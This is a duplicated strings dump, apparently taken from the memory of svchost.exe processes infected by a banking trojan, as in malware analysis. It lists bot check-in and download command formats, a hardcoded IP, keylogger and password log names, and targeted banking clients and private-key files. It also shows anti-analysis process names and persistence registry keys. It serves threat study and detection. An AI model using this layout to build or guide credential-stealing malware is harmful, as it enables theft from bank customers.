wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1156_rwx_00900000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
NETWORKSERVICE!XP3!F9BE9A8A
NETWORKSERVICE!XP3!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\NetworkService\Application Data\
%Documents and Settings%\NetworkService\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1200_rwx_00C70000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
